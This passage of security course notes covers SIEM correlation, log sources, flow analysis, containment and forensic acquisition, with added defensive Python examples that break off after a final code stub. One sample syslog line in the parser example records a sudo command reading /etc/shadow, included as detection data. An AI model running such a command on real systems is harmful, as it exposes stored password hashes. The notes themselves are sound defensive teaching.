● Incident analysis is greatly facilitated by a security information and event
management (SIEM) system.
● A SIEM parses network traffic and log data from multiple sensors, appliances,
and hosts and normalizes the information to standard field types.
● Correlation:
○ Correlation means interpreting the relationship between individual data
points to diagnose incidents of significance to the security team.
○ Correlation rules use logical expressions, such as AND and OR, and operators,
such as == (matches), < (less than), > (greater than), and in (contains).
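
A small correlation rule built from those logical expressions and operators and run over normalized events, as an added example that is not part of the original notes. The rule syntax, the field names, and the sample events are assumptions; real SIEM products each have their own rule language.

```python
import operator
from collections import defaultdict
from datetime import datetime, timedelta

# Operators named in the text; "in" is read here as "field value is a member of".
OPS = {
    "==": operator.eq,
    "<": operator.lt,
    ">": operator.gt,
    "in": lambda field_value, allowed: field_value in allowed,
}


def matches(expr, event):
    """Evaluate a nested AND/OR expression against one normalized event."""
    head = expr[0]
    if head == "AND":
        return all(matches(sub, event) for sub in expr[1:])
    if head == "OR":
        return any(matches(sub, event) for sub in expr[1:])
    field, op, value = expr
    if field not in event:  # a missing field never satisfies a condition
        return False
    return OPS[op](event[field], value)


def correlate(events, expr, group_by, threshold, window):
    """Alert when more than `threshold` matching events share a key in `window`."""
    recent = defaultdict(list)
    alerts = []
    for event in sorted(events, key=lambda e: e["time"]):
        if not matches(expr, event):
            continue
        times = recent[event[group_by]]
        times.append(event["time"])
        while event["time"] - times[0] > window:  # expire old timestamps
            times.pop(0)
        if len(times) > threshold:
            alerts.append({"key": event[group_by], "count": len(times),
                           "at": event["time"]})
            times.clear()  # re-arm so one burst produces one alert
    return alerts


T0 = datetime(2024, 1, 1, 9, 0, 0)


def make_event(offset_s, src_ip, user, outcome, dst_port=22):
    return {"time": T0 + timedelta(seconds=offset_s), "event_type": "logon",
            "src_ip": src_ip, "user": user, "outcome": outcome,
            "dst_port": dst_port}


# Constructed events, already normalized to common field names.
SAMPLE_EVENTS = [
    make_event(0, "203.0.113.7", "svc_backup", "failure"),
    make_event(10, "203.0.113.7", "svc_backup", "failure"),
    make_event(15, "198.51.100.20", "alice", "failure", 3389),
    make_event(20, "203.0.113.7", "svc_backup", "failure"),
    make_event(30, "203.0.113.7", "svc_backup", "failure"),
    make_event(40, "203.0.113.7", "svc_backup", "failure"),
    make_event(45, "10.0.0.5", "bob", "success"),
    make_event(7200, "203.0.113.7", "svc_backup", "failure"),
]

# Hypothetical rule: failed remote logons over SSH or RDP.
FAILED_REMOTE_LOGON = (
    "AND",
    ("event_type", "==", "logon"),
    ("outcome", "==", "failure"),
    ("OR", ("dst_port", "==", 22), ("dst_port", "==", 3389)),
)


def sample_alerts():
    """More than 3 failures from one source address within 60 seconds."""
    return correlate(SAMPLE_EVENTS, FAILED_REMOTE_LOGON, "src_ip",
                     threshold=3, window=timedelta(seconds=60))


if __name__ == "__main__":
    for alert in sample_alerts():
        print(alert)
```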

SIEM Dashboards
● A SIEM dashboard provides a console to work from for day-to-day incident
response.
● An incident handler's dashboard will contain uncategorized events that have
been assigned to their account, plus visualizations (graphs and tables) showing
key status metrics.
● Sensitivity and Alerts:
○ One of the greatest challenges in operating a SIEM is tuning the system
sensitivity to reduce false positive indicators being reported as an event.
○ Log only—an event is produced and added to the SIEM's database, but it
is automatically classified.
○ Alert—the event is listed on a dashboard or incident handling system for
an agent to assess. The agent classifies the event and either dismisses it
to the log or escalates it as an incident.
○ Alarm—the event is automatically classified as critical and a priority alarm
is raised.
● Sensors:
○ A sensor is a network tap or port mirror that performs packet capture and
intrusion detection.

Trend Analysis
● Trend analysis is the process of detecting patterns or indicators within a data
set over a time series and using those patterns to make predictions about future
events.
● Trend analysis can apply to frequency, volume, or statistical deviation:
○ Frequency-based trend analysis establishes a baseline for a metric, such
as number of NXERROR DNS log events per hour of the day.
■ If the frequency exceeds (or in some cases undershoots) the
threshold for the baseline, then an alert is raised.
○ Volume-based trend analysis can be performed with simpler indicators.
■ For example, one simple metric for determining threat level is log
volume. If logs are growing much faster than they were previously,
there is a good chance that something needs investigating.
○ Statistical deviation analysis can show when a data point should be
treated as suspicious.
■ A data point that appears outside the two clusters for standard and
administrative users might indicate some suspicious activity by that
account.
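
Frequency-based and statistical deviation analysis combined into one per-hour baseline check, plus the simple log volume ratio, as an added example that is not part of the original notes. The history values, the 3-sigma threshold, and the function names are assumptions chosen for illustration.

```python
from collections import defaultdict
from statistics import mean, stdev


def build_baseline(history):
    """history: iterable of (hour_of_day, event_count) observations.

    Returns {hour: (mean, sample standard deviation)} for hours that have
    at least two observations.
    """
    by_hour = defaultdict(list)
    for hour, count in history:
        by_hour[hour].append(count)
    return {h: (mean(c), stdev(c)) for h, c in by_hour.items() if len(c) >= 2}


def classify(baseline, hour, count, k=3.0, min_sigma=1.0):
    """Compare one new count with the baseline for that hour of the day."""
    if hour not in baseline:
        return "no-baseline"
    mu, sigma = baseline[hour]
    # A near-zero deviation would turn every small change into an alert.
    sigma = max(sigma, min_sigma)
    if count > mu + k * sigma:
        return "high"   # frequency exceeds the threshold
    if count < mu - k * sigma:
        return "low"    # undershoot, e.g. a source that stopped logging
    return "normal"


def volume_growth(previous_bytes, current_bytes):
    """Volume-based indicator: this period's log volume over the last one."""
    if previous_bytes == 0:
        return float("inf") if current_bytes else 1.0
    return current_bytes / previous_bytes


def scan(baseline, observations, k=3.0):
    """Return only the observations that deviate from the baseline."""
    findings = []
    for hour, count in observations:
        verdict = classify(baseline, hour, count, k=k)
        if verdict in ("high", "low"):
            findings.append((hour, count, verdict))
    return findings


# Constructed history: one week of failed DNS lookup counts for two hours.
HISTORY = (
    [(3, c) for c in (4, 5, 6, 5, 4, 6, 5)]
    + [(14, c) for c in (120, 130, 110, 125, 115, 135, 105)]
)

# Constructed observations for the day being checked.
TODAY = [(3, 7), (3, 40), (14, 128), (14, 20)]

if __name__ == "__main__":
    baseline = build_baseline(HISTORY)
    for finding in scan(baseline, TODAY):
        print(finding)
    print("log volume ratio:", volume_growth(100, 450))
```

The same count can be normal at one hour and an alert at another, which is why the baseline is kept per hour of the day rather than as one global figure.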

Logging Platforms
● Syslog:
○ A protocol enabling different appliances and software applications to
transmit logs or event records to a central server.
○ For example, syslog messages can be generated by Cisco routers and
switches, as well as servers and workstations.
○ A syslog message comprises a PRI code, a header containing a
timestamp and host name, and a message part.
● Rsyslog and Syslog-ng:
○ There have been two updates to the original syslog specification:
■ Rsyslog uses the same configuration file syntax, but can work over
TCP and use a secure connection.
■ Syslog-ng uses a different configuration file syntax, but can also
use TCP/secure communications and more advanced options for
message filtering.
● Journalctl:
○ In Linux, text-based log files of the sort managed by syslog can be viewed
using commands such as cat, tail, and head.
○ Logs from processes managed by systemd are written to a binary-format
file called journald.
■ Events captured by journald can be forwarded to syslog.
● NXlog:
○ An open-source log normalization tool. One principal use for it is to collect
Windows logs, which use an XML-based format, and normalize them to a
syslog format.
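
A parser for the syslog message layout described above (PRI code, header with timestamp and host name, message part), as an added example that is not part of the original notes. It assumes the traditional BSD line format, in which PRI is facility × 8 + severity; the sample lines are constructed.

```python
import re

SEVERITIES = ["emerg", "alert", "crit", "err",
              "warning", "notice", "info", "debug"]
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr",
              "news", "uucp", "cron", "authpriv", "ftp", "ntp", "audit",
              "alert", "clock", "local0", "local1", "local2", "local3",
              "local4", "local5", "local6", "local7"]

LINE_RE = re.compile(
    r"^<(?P<pri>\d{1,3})>"
    r"(?P<timestamp>[A-Z][a-z]{2} [ 1-3]\d \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) "
    r"(?P<msg>.*)$"
)
# Message part: optional "tag[pid]:" prefix, then free text.
TAG_RE = re.compile(r"^(?P<tag>[^\s:\[]+)(?:\[(?P<pid>\d+)\])?: ?(?P<text>.*)$")


def parse_syslog(line):
    """Split one syslog line into PRI (facility/severity), header, and message."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if m is None:
        raise ValueError("not a BSD-style syslog line")
    pri = int(m["pri"])
    if pri > 191:  # 23 * 8 + 7 is the largest valid PRI
        raise ValueError("PRI out of range")
    facility, severity = divmod(pri, 8)
    record = {
        "facility": FACILITIES[facility],
        "severity": SEVERITIES[severity],
        "timestamp": m["timestamp"],  # no year or time zone in this format
        "host": m["host"],
        "tag": None,
        "pid": None,
        "text": m["msg"],
    }
    t = TAG_RE.match(m["msg"])
    if t:
        record.update(tag=t["tag"], text=t["text"],
                      pid=int(t["pid"]) if t["pid"] else None)
    return record


def parse_many(lines):
    """Parse every line, keeping malformed ones for review instead of dropping them."""
    records, rejected = [], []
    for line in lines:
        try:
            records.append(parse_syslog(line))
        except ValueError:
            rejected.append(line)
    return records, rejected


def auth_related(records):
    """Records logged under the security/authorization facilities."""
    return [r for r in records if r["facility"] in ("auth", "authpriv")]


# Constructed sample lines; the last one carries an invalid PRI on purpose.
SAMPLE_LINES = [
    "<38>Mar  4 09:12:01 web01 sshd[2211]: Failed password for invalid user "
    "admin from 203.0.113.7 port 51122 ssh2",
    "<86>Mar 14 23:59:59 db02 sudo: alice : TTY=pts/0 ; USER=root ; "
    "COMMAND=/bin/cat /etc/shadow",
    "<14>Mar  4 09:13:40 web01 app: cache warmed",
    "<999>Mar  4 09:14:00 web01 app: bad pri",
]

if __name__ == "__main__":
    parsed, bad = parse_many(SAMPLE_LINES)
    for rec in auth_related(parsed):
        print(rec["host"], rec["facility"], rec["severity"], rec["tag"], rec["text"])
    print("rejected:", bad)
```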

Network, OS, and Security Log Files


● System and Security Logs:
○ One source of security information is the event log from each network
server or client.
○ Systems such as Microsoft Windows, Apple macOS, and Linux keep a
variety of logs to record events as users and software interact with the
system.
● The five main categories of Windows event logs are:
○ Application—events generated by applications and services, such as
when a service cannot start.
○ Security—audit events, such as a failed logon or access to a file being
denied.
○ System—events generated by the operating system and its services, such
as storage volume health checks.
○ Setup—events generated during the installation of Windows.
○ Forwarded Events—events that are sent to the local log from other hosts.
● Network Logs:
○ Network logs are generated by appliances such as routers, firewalls,
switches, and access points.
○ Log files will record the operation and status of the appliance itself—the
system log for the appliance—plus traffic and access logs recording
network behavior, such as a host trying to use a port that is blocked by the
firewall, or an endpoint trying to use multiple MAC addresses when
connected to a switch.
● Authentication Logs:
○ Authentication attempts for each host are likely to be written to the security
log.
● Vulnerability Scan Output:
○ The scan engine might log or alert when a scan report contains
vulnerabilities.
○ The report can be analyzed to identify vulnerabilities that have not been
patched or configuration weaknesses that have not been remediated.

Application Log Files


● An application log file is simply one that is managed by the application rather
than the OS.
● The application may use Event Viewer or syslog to write event data using a
standard format, or it might write log files to its own application directories in
whatever format the developer has selected.
● DNS Event Logs:
○ A DNS server may log an event each time it handles a request to convert
between a domain name and an IP address.
○ DNS event logs can hold a variety of information that may supply useful
security intelligence, such as:
■ The types of queries a host has made to DNS.
■ Hosts that are in communication with suspicious IP address ranges
or domains.
■ Statistical anomalies such as spikes or consistently large numbers
of DNS lookup failures, which may point to computers that are
infected with malware, misconfigured, or running obsolete or faulty
applications.
● Web/HTTP Access Logs:
○ Web servers are typically configured to log HTTP traffic that encounters
an error or traffic that matches some predefined rule set.
○ The status code of a response can reveal quite a bit about both the
request and the server's behavior.
○ Codes in the 400 range indicate client-based errors, while codes in the
500 range indicate server-based errors.
○ For example, repeated 403 ("Forbidden") responses may indicate that the
server is rejecting a client's attempts to access resources they are not
authorized to.
○ A 502 ("Bad Gateway") response could indicate that communications
between the target server and its upstream server are being blocked, or
that the upstream server is down.
● VoIP and Call Managers and Session Initiation Protocol (SIP) Traffic:
○ Many VoIP systems use the Session Initiation Protocol (SIP) to identify
endpoints and set up calls.
○ The call content is transferred using a separate protocol, typically the
Real-time Transport Protocol (RTP).
○ The call manager is a gateway that connects endpoints within the local
network and over the Internet.
■ The call manager is also likely to implement a media gateway to
connect VoIP calls to cellphone and landline telephone networks.
○ SIP produces similar logs to SMTP, typically in the common log format.
■ A SIP log will identify the endpoints involved in a call request, plus
the type of connection (voice only or voice with video, for instance),
and status messaging.
● Dump Files:
○ A system memory dump creates an image file that can be analyzed to
identify the processes that are running, the contents of temporary file
systems, registry data, network connections, cryptographic keys, and
more.

Metadata
● Information stored or recorded as a property of an object, state of a system, or
transaction.
● A number of metadata sources are likely to be useful when investigating
incidents, because they can establish timeline questions, such as when and
where, as well as containing other types of evidence.
● File:
○ File metadata is stored as attributes.
○ The file system tracks when a file was created, accessed, and modified.
● Web:
○ When a client requests a resource from a web server, the server returns
the resource plus headers setting or describing its properties.
○ Also, the client can include headers in its request.
■ One key use of headers is to transmit authorization information, in
the form of cookies.
● Email:
○ An email's Internet header contains address information for the recipient
and sender, plus details of the servers handling transmission of the
message between them.
○ When an email is created, the mail user agent (MUA) creates an initial
header and forwards the message to a mail delivery agent (MDA).
■ The MDA should perform checks that the sender is authorized to
issue messages from the domain.
■ Assuming the email isn't being delivered locally at the same
domain, the MDA adds or amends its own header and then
transmits the message to a message transfer agent (MTA).
■ The MTA routes the message to the recipient, with the message
passing via one or more additional MTAs, such as SMTP servers
operated by ISPs or mail security gateways.
● Mobile:
○ Mobile phone metadata comprises call detail records (CDRs) of incoming,
outgoing, and attempted calls and SMS texts, recording the time, duration,
and the opposite party's number.
○ If you are investigating a suspected insider attack, this metadata could
prove a suspect's whereabouts.
○ CDRs are generated and stored by the mobile operator.

Network Data Sources
● Network data is typically analyzed in detail at the level of individual frames or
using summary statistics of traffic flows and protocol usage.
● Protocol Analyzer Output:
○ A SIEM will store details from sensors at different points on the network.
○ Information captured from network packets can be aggregated and
summarized to show overall protocol usage and endpoint activity.
○ Typically, packet contents are only retained when indicators from the
traffic are correlated as an event.
● Netflow/IPFIX:
○ A flow collector is a means of recording metadata and statistics about
network traffic rather than recording each frame.
○ Network traffic and flow data may come from a wide variety of sources (or
probes), such as switches, routers, firewalls, web proxies, and so forth.
○ Flow analysis tools can provide features such as:
■ Highlighting of trends and patterns in traffic generated by particular
applications, hosts, and ports.
■ Alerting based on detection of anomalies, flow analysis patterns, or
custom triggers.
■ Visualization tools that enable you to quickly create a map of
network connections and interpret patterns of traffic and flow data.
■ Identification of traffic patterns revealing rogue user behavior,
malware in transit, tunneling, applications exceeding their allocated
bandwidth, and so forth.
■ Identification of attempts by malware to contact a handler or
command & control (C&C) channel.
● NetFlow is a Cisco-developed means of reporting network flow information to a
structured database.
○ NetFlow has been redeveloped as the IP Flow Information Export
(IPFIX) IETF standard.
○ A particular traffic flow can be defined by packets sharing the same
characteristics, referred to as keys, such as IP source and destination
addresses and protocol type.
○ You can use a variety of NetFlow monitoring tools to capture data for
point-in-time analysis and to diagnose any security or operational issues
the network is experiencing.
● sFlow:
○ Web standard for using sampling to record network traffic statistics.
● Bandwidth Monitor:
○ Bandwidth usage can be a key indicator of suspicious behavior, if you
have reliable baselines for comparison.
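
How packets sharing the same keys collapse into flow records, and how those records support a bandwidth check against a baseline, as an added example that is not part of the original notes. The Packet tuple, the 30-second idle timeout, the baseline figures, and the sample traffic are assumptions; this is not the NetFlow or IPFIX export format itself.

```python
from collections import namedtuple

Packet = namedtuple("Packet", "ts src dst proto sport dport length")


def aggregate(packets, idle_timeout=30.0):
    """Group packets into unidirectional flows keyed on the 5-tuple.

    A gap longer than idle_timeout closes the flow, so a later packet with
    the same keys starts a new record.
    """
    active, finished = {}, []
    for p in sorted(packets, key=lambda pkt: pkt.ts):
        key = (p.src, p.dst, p.proto, p.sport, p.dport)
        flow = active.get(key)
        if flow and p.ts - flow["last"] > idle_timeout:
            finished.append(active.pop(key))
            flow = None
        if flow is None:
            flow = active[key] = {"key": key, "first": p.ts, "last": p.ts,
                                  "packets": 0, "bytes": 0}
        flow["last"] = p.ts
        flow["packets"] += 1
        flow["bytes"] += p.length
    finished.extend(active.values())
    return sorted(finished, key=lambda f: f["first"])


def outbound_bytes(flows):
    """Total bytes sent per source address across all of its flows."""
    totals = {}
    for f in flows:
        src = f["key"][0]
        totals[src] = totals.get(src, 0) + f["bytes"]
    return totals


def exceeds_baseline(flows, baseline, factor=5):
    """Sources sending more than factor x their baseline, or with no baseline."""
    flagged = []
    for src, sent in sorted(outbound_bytes(flows).items()):
        expected = baseline.get(src)
        if expected is None or sent > factor * expected:
            flagged.append((src, sent, expected))
    return flagged


# Constructed traffic: a short web session, the same 5-tuple again after a
# long idle gap, and one host sending a sustained stream to an outside address.
SAMPLE_PACKETS = (
    [Packet(t, "10.0.0.5", "192.0.2.10", "tcp", 50000, 443, 500)
     for t in (0.0, 1.0, 2.0)]
    + [Packet(100.0, "10.0.0.5", "192.0.2.10", "tcp", 50000, 443, 200)]
    + [Packet(5.0 + i * 0.01, "10.0.0.9", "198.51.100.8", "tcp", 40000, 443, 1400)
       for i in range(1000)]
)

# Constructed per-host baseline of outbound bytes for the same period.
BASELINE = {"10.0.0.5": 2000, "10.0.0.9": 50000}

if __name__ == "__main__":
    flows = aggregate(SAMPLE_PACKETS)
    for f in flows:
        print(f["key"], f["packets"], "packets", f["bytes"], "bytes")
    print("over baseline:", exceeds_baseline(flows, BASELINE))
```

The 1,004 packets reduce to three flow records, which is the storage saving a flow collector offers over retaining every frame.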

Incident Containment
● Isolation-Based Containment:
○ Isolation involves removing an affected component from whatever larger
environment it is a part of.
○ A simple option is to disconnect the host from the network completely,
either by pulling the network plug (creating an air gap) or disabling its
switch port.
● Segmentation-Based Containment:
○ A means of achieving the isolation of a host or group of hosts using
network technologies and architecture.
○ Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent
a host or group of hosts from communicating outside the protected
segment.

Incident Eradication and Recovery


● After an incident has been contained, you can apply mitigation techniques and
controls to eradicate the intrusion tools and unauthorized configuration changes
from your systems.
● Eradicating malware, backdoors, and compromised accounts from individual
hosts is not the last step in incident response.
● Eradication of malware or other intrusion mechanisms and recovery from the
attack will involve several steps:
○ 1. Reconstitution of affected systems—either remove the malicious files or
tools from affected systems or restore the systems from secure
backups/images.
○ 2. Reaudit security controls—ensure they are not vulnerable to another
attack.
○ 3. Ensure that affected parties are notified and provided with the means to
remediate their own systems.
■ For example, if customers' passwords are stolen, they should be
advised to change the credentials for any other accounts where
that password might have been used (not good practice, but most
people do it).

Firewall Configuration Changes


● Analysis of the attack is used to identify the vector exploited and the
configuration changes that block that attack vector.
● A configuration change may mean the deployment of a new type of security
control, or altering the settings of an existing control to make it more effective.
● Some general guidelines for configuring egress filtering are:
○ Allow only authorized application ports and, if possible, restrict the
destination addresses to authorized Internet hosts.
○ Restrict DNS lookups to your own or your ISP's DNS services or
authorized public resolvers, such as Google's or Quad9's DNS services.
○ Block access to "known bad" IP address ranges, as listed on don't route or
peer (DROP) filter lists.
○ Block access from any IP address space that is not authorized for use on
your local network.
○ Block all Internet access from host subnets that do not need to connect to
the Internet, such as most types of internal server, workstations used to
manage industrial control systems (ICSs), and so on.

Content Filter Configuration Changes


● The limitations of a basic packet filtering firewall (even if it is stateful) mean that
some sort of content filtering application proxy may provide better security.
○ These types of appliances are usually referred to as secure web gateways
(SWGs).
○ A SWG mediates user access to Internet services, with the ability to block
content from regularly updated URL/domain/IP block lists and perform
intrusion detection/prevention on traffic based on matching content in
application layer protocol headers and payloads.
● Data Loss Prevention (DLP):
○ Data loss prevention (DLP) performs a similar function, but instead of user
access it mediates the copying of tagged data to restrict it to authorized
media and services.
● Update or Revoke Certificates:
○ Remove compromised root certificates—if an attacker has managed to
install a root certificate, the attacker can make malicious hosts and
services seem trusted.
○ Revoke certificates on compromised hosts—if a host is compromised, the
private key it used for digital signatures or digital envelopes is no longer
safe.

Endpoint Configuration Changes


● If endpoint security is breached, there are several classes of vector to consider
for mitigation:
○ Social engineering—if the malware was executed by a user, use security
education and awareness to reduce the risk of future attacks succeeding.
■ Review permissions to see if the account could be operated with a
lower privilege level.
○ Vulnerabilities—if the malware exploited a software fault, either install the
patch or isolate the system until a patch can be developed.
○ Lack of security controls—if the attack could have been prevented by
endpoint protection/A-V, host firewall, content filtering, DLP, or MDM,
investigate the possibility of deploying them to the endpoint.
○ Configuration drift—if the malware exploited an undocumented
configuration change (shadow IT software or an unauthorized service/port,
for instance), reapply the baseline configuration and investigate
configuration management procedures to prevent this type of ad hoc
change.
○ Weak configuration—if the configuration was correctly applied, but was
exploited anyway, review the template to devise more secure settings.
● Application Allow Lists and Block Lists:
○ An allow list (or approved list) denies execution unless the process is
explicitly authorized.
○ A block list (or deny list) generally allows execution, but explicitly prohibits
listed processes.
● Quarantine:
○ The process of isolating a file, computer system, or computer network to
prevent the spread of a virus or another cybersecurity incident.

Security Orchestration, Automation, and Response


● Automation is the action of scripting a single activity, while orchestration is the
action of coordinating multiple automations (and possibly manual activity) to
perform a complex, multistep task.
● Security Orchestration, Automation, and Response (SOAR):
○ A class of security tools that facilitates incident response, threat hunting,
and security configuration by orchestrating automated runbooks and
delivering data enrichment.
○ SOAR is designed as a solution to the problem of the volume of alerts
overwhelming analysts' ability to respond, measured as the mean time to
respond (MTTR).
○ It can also assist with provisioning tasks, such as creating and deleting
user accounts, making shares available, or launching VMs from templates,
to try to eliminate configuration errors.
● An incident response workflow is usually defined as a playbook.
○ A playbook is a checklist of actions to detect and respond to a specific
type of incident.
○ A playbook should be made highly specific by including the query strings
and signatures that will detect a particular type of incident.
○ Runbook: An automated version of a playbook that leaves clearly defined
interaction points for human analysis.

Adversarial Artificial Intelligence


● Artificial Intelligence (AI)-type systems are used extensively for User and Entity
Behavior Analytics (UEBA).
○ A UEBA is trained on security data from customer systems and
honeypots.
○ This allows the AI to determine features of malicious code and account
activity and to recognize those features in novel data streams.
● Adversarial AI: Using AI to identify vulnerabilities and attack vectors to
circumvent security systems.

Lesson 18: Explaining Digital Forensics

Key Aspects of Digital Forensics


● Digital forensics is the practice of collecting evidence from computer systems to
a standard that will be accepted in a court of law.
● Evidence, Documentation, and Admissibility:
○ Like DNA or fingerprints, digital evidence is latent.
○ Latent means that the evidence cannot be seen with the naked eye;
rather, it must be interpreted using a machine or process.
● Due process is a term used in US and UK common law to require that people
only be convicted of crimes following the fair application of the laws of the land.
● Legal Hold:
○ Legal hold refers to the fact that information that may be relevant to a
court case must be preserved.
● Chain of Custody:
○ Chain of custody documentation reinforces the integrity and proper
handling of evidence from collection, to analysis, to storage, and finally to
presentation.

Digital Forensics Reports

● Analysis must be performed without bias. Conclusions and opinions should be
formed only from the direct evidence under analysis.
● Analysis methods must be repeatable by third parties with access to the same
evidence.
● Ideally, the evidence must not be changed or manipulated. If a device used as
evidence must be manipulated to facilitate analysis (disabling the lock feature of
a mobile phone or preventing a remote wipe for example), the reasons for doing
so must be sound and the process of doing so must be recorded.

E-Discovery
● E-discovery is a means of filtering the relevant evidence produced from all the
data gathered by a forensic examination and storing it in a database in a format
such that it can be used as evidence in a trial.
● Some of the functions of e-discovery suites are:
○ Identify and deduplicate files and metadata—many files on a computer
system are "standard" installed files or copies of the same file.
■ E-discovery filters these types of files, reducing the volume of data
that must be analyzed.
○ Search—allow investigators to locate files of interest to the case.
■ As well as keyword search, software might support semantic
search.
○ Tags—apply standardized keywords or labels to files and metadata to
help organize the evidence.
■ Tags might be used to indicate relevancy to the case or part of the
case or to show confidentiality, for instance.
○ Security—at all points evidence must be shown to have been stored,
transmitted, and analyzed without tampering.
○ Disclosure—an important part of trial procedure is that the same evidence
be made available to both plaintiff and defendant.
■ Recent court cases have required parties to a court case to provide
searchable ESI rather than paper records.

Timelines
● Operating systems and file systems use a variety of methods to identify the time
at which something occurred.
● The benchmark time is Coordinated Universal Time (UTC), which is essentially
the time at the Greenwich meridian.
● Time Offset: In forensics, identifying whether a time zone offset has been applied
to a file's time stamp.
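
An added example (not part of the original notes) of why the time offset matters when building a timeline: each record carries the timestamp as recorded plus the UTC offset of the system that wrote it, and everything is converted to UTC before sorting. The sources, times, and offsets are constructed for illustration; a record whose offset has not been established is set aside rather than assumed to be UTC.

```python
from datetime import datetime, timezone

# Constructed sample records: (source, timestamp as recorded, UTC offset of the recorder).
# "+00:00" means the source already logs in UTC; None means the offset is not yet known.
SAMPLE_EVENTS = [
    ("workstation file",  "2021-03-04 09:01:55", "-05:00"),
    ("firewall log",      "2021-03-04 14:02:10", "+00:00"),
    ("mail server log",   "2021-03-04 15:01:00", "+01:00"),
    ("branch router log", "2021-03-04 19:32:40", "+05:30"),
    ("usb stick file",    "2021-03-04 14:00:00", None),
]


def to_utc(recorded, offset):
    """Convert a recorded timestamp and its UTC offset to an aware UTC datetime."""
    aware = datetime.strptime(recorded + offset, "%Y-%m-%d %H:%M:%S%z")
    return aware.astimezone(timezone.utc)


def build_timeline(events):
    """Return (timeline, unresolved).

    timeline   -- list of (utc_datetime, source), sorted by UTC time
    unresolved -- records whose offset is unknown; they are kept out of the
                  timeline until the examiner has established the offset
    """
    timeline, unresolved = [], []
    for source, recorded, offset in events:
        if offset is None:
            unresolved.append((source, recorded))
            continue
        timeline.append((to_utc(recorded, offset), source))
    timeline.sort()
    return timeline, unresolved


if __name__ == "__main__":
    ordered, pending = build_timeline(SAMPLE_EVENTS)
    for moment, source in ordered:
        print(moment.strftime("%Y-%m-%d %H:%M:%SZ"), source)
    for source, recorded in pending:
        print("offset unknown, not placed:", source, recorded)
```

Sorting the same records by the recorded text alone would put the workstation file first; after conversion the mail server event is the earliest.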

Event Logs and Network Traffic


● An investigation may also obtain the event logs for one or more network
appliances and/or server hosts.
● A Retrospective Network Analysis (RNA) solution provides the means to record
network events at either a packet header or payload level.

Strategic Intelligence and Counterintelligence


● Digital forensics can be used for information gathering to protect against
espionage and hacking.
● This intelligence is deployed in two different ways:
○ Counterintelligence—identification and analysis of specific adversary
tactics, techniques, and procedures (TTP) provides information about how
to configure and audit active logging systems so that they are most likely
to capture evidence of attempted and successful intrusions.
○ Strategic intelligence—data and research that has been analyzed to
produce actionable insights.
■ These insights are used to inform risk management and security
control provisioning to build mature cybersecurity capabilities.

Data Acquisition and Order of Volatility


● Acquisition is the process of obtaining a forensically clean copy of data from a
device held as evidence.
● If the computer system or device is not owned by the organization, there is the
question of whether search or seizure is legally valid.
○ This impacts bring-your-own-device (BYOD) policies.
● Data acquisition is also complicated by the fact that it is more difficult to capture
evidence from a digital crime scene than it is from a physical one.
○ An image can be acquired from either volatile or nonvolatile storage.
○ The general principle is to capture evidence in the order of volatility,
from more volatile to less volatile.
● The ISOC best practice guide to evidence collection and archiving sets out the
general order as follows:
○ 1. CPU registers and cache memory (including cache on disk controllers,
GPUs, and so on).
○ 2. Contents of nonpersistent system memory (RAM), including routing
table, ARP cache, process table, kernel statistics.
○ 3. Data on persistent mass storage devices (HDDs, SSDs, and flash
memory devices):
○ 4. Remote logging and monitoring data.
○ 5. Physical configuration and network topology.
○ 6. Archival media and printed documents.

Digital Forensics Software


● Most of the commercial forensics tools are available for the Windows platform
only.
● EnCase Forensic is a digital forensics case management product created by
Guidance Software.
○ Case management is assisted by built-in pathways, or workflow templates,
showing the key steps in diverse types of investigation.
● The Forensic Toolkit (FTK): A commercial digital forensics investigation
management and utilities suite, published by AccessData.
● The Sleuth Kit: an open-source collection of command line tools and
programming libraries for disk imaging and file analysis
○ Autopsy is a graphical front-end for these tools and acts as a case
management/workflow tool.
● X-Ways Forensics (x-ways.net/forensics/) is a commercial tool for forensic
recovery and analysis of binary data, with support for a range of file systems and
memory dump types (depending on version).
● The Volatility Framework (github.com/volatilityfoundation/volatility) is widely used
for system memory analysis.

System Memory Acquisition


● A system memory dump creates an image file that can be analyzed to identify
the processes that are running, the contents of temporary file systems, registry
data, network connections, cryptographic keys, and more.
● Live Acquisition:
○ A specialist hardware or software tool can capture the contents of memory
while the host is running.
○ Unfortunately, this type of tool needs to be preinstalled as it requires a
kernel mode driver to dump any data of interest.
● Crash Dump:
○ When Windows encounters an unrecoverable kernel error, it can write
contents of memory to a dump file at C:\Windows\MEMORY.DMP.
● Hibernation File and Pagefile:
○ A hibernation file is created on disk in the root folder of the boot volume
when a Windows host is put into a sleep state.
○ If it can be recovered, the data can be decompressed and loaded into a
software tool for analysis.
○ The pagefile/swap file/swap partition stores pages of memory in use that
exceed the capacity of the host's RAM modules.
■ The pagefile is not structured in a way that analysis tools can
interpret, but it is possible to search for strings.

Disk Image Acquisition


● Disk image acquisition refers to acquiring data from nonvolatile storage.
● This can also be referred to as device acquisition, meaning the SSD storage in a
smartphone or media player.
● There are three device states for persistent storage acquisition:
○ Live acquisition—this means copying the data while the host is still
running.
■ This may capture more evidence or more data for analysis and
reduce the impact on overall services, but the data on the actual
disks will have changed, so this method may not produce legally
acceptable evidence.
○ Static acquisition by shutting down the host—this runs the risk that the
malware will detect the shutdown process and perform anti-forensics to try
to remove traces of itself.
○ Static acquisition by pulling the plug—this means disconnecting the power
at the wall socket (not the hardware power-off button).
■ This is most likely to preserve the storage devices in a forensically
clean state, but there is the risk of corrupting data.
● DD Command: Linux command that makes a bit-by-bit copy of an input file,
typically used for disk imaging.

Preservation and Integrity of Evidence


● It is vital that the evidence collected at the crime scene conform to a valid
timeline.
● Digital information is susceptible to tampering, so access to the evidence must
be tightly controlled.
● Recording the whole process establishes the provenance of the evidence as
deriving directly from the crime scene.
● Write Blocker: Forensic tool to prevent the capture or analysis device or
workstation from changing data on a target disk or media.
● Data Acquisition with Integrity and Non-Repudiation:
○ Once the target disk has been safely attached to the forensics
workstation, data acquisition proceeds as follows:
■ 1. A cryptographic hash of the disk media is made, using either the
MD5 or SHA hashing function. The output of the function can be
described as a checksum.
■ 2. A bit-by-bit copy of the media is made using the imaging utility.
■ 3. A second hash is then made of the image, which should match
the original hash of the media.
■ 4. A copy is made of the reference image, validated again by the
checksum. Analysis is performed on the copy.
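
The four acquisition steps above, as an added example that is not part of the original notes. It assumes SHA-256 as the SHA function, uses a chunked byte-for-byte copy as a stand-in for the imaging utility (such as dd), and runs against a constructed file instead of a real disk; the function and file names are hypothetical.

```python
import hashlib
import os
import shutil
import tempfile

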